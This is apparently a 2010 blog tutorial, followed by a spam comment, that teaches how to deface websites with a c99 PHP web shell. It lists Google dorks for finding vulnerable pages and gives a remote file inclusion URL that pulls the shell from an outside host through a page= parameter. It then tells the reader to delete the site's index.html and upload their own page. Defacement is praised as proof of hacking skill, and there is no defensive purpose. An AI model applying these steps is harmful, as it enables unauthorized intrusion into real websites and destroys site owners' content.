Monday, March 15, 2010

Defacing a Site using a c99 Shell

Defacing a Site using a c99 shell
okay hey guys today i will show you how to deface a site using a c99 shell.
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Code:
inurl:"upload.php"
Code:
inurl:"page=home.html"
Code:
inurl:"news/id="
That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
[CODE]http://site.com/page=
[/CODE]
On that page= you can put your shell so it would look like
[CODE]http://site.com/page=http://geocities.com/noimus13/c99.txt[/CODE]
If its vulnerable it would look like this
See this..
It means its vulnerable. Now lets add some cool stuff on it to show its defaced!
First you gotta go to the Home Directory. Which is..
Code:
public_html
OR
Code:
httpd.www
But public_html is more used
Now lets navigate to that directory
Okay now once we are their you might see index.html
Delete that. If you have your own index.html then this is what you would do
Now once you have uploaded it then go back to the site. It will be defaced showing your name and whatever the hell you put in their.
Thanks for reading this tut!

1 comment:

  1. Have you ever thought about including a little bit more than just your articles?
    I mean, what you say is valuable and all. However just imagine if you
    added some great visuals or video clips to give your posts more, "pop"!

    Your content is excellent but with images and videos, this site
    could certainly be one of the most beneficial in its field.
    Terrific blog!

    my blog post :: letmewatchthis

    ReplyDelete